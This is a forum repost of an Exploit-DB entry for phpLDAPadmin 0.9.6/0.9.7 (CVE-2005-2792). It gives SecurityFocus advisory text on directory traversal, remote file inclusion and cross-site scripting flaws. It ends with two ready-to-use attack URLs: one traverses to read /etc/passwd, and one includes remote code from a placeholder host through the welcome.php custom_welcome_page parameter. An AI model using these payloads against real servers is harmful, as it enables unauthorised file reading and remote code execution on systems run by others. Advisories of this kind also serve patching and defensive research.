Exploit phpLDAPadmin 0.9.6/0.9.7 - 'welcome.php' Arbitrary File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
26211
Проверка EDB
  1. Пройдено
Автор
RGOD
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2005-2792
Дата публикации
2005-08-30
Код:
source: https://www.securityfocus.com/bid/14695/info

phpldapadmin is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.

phpldapadmin is prone to a directory traversal vulnerability. An attacker can exploit this vulnerability to retrieve arbitrary files on the vulnerable system in the security context of the Web server process. Information obtained may aid in further attacks against the underlying system; other attacks are also possible.

phpldapadmin is prone to a remote file include vulnerability. An attacker can exploit this vulnerability to execute arbitrary PHP script code in the security context of the Web server process.

phpldapadmin is also prone to a cross-site scripting vulnerability. An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. 

http://www.example.com/phpldapadmin/welcome.php?custom_welcome_page=../../../../../../../../etc/passwd
http://www.example.com/phpldapadmin/welcome.php?custom_welcome_page=http://www.example.com/[malicious code]
 
Источник
www.exploit-db.com

Похожие темы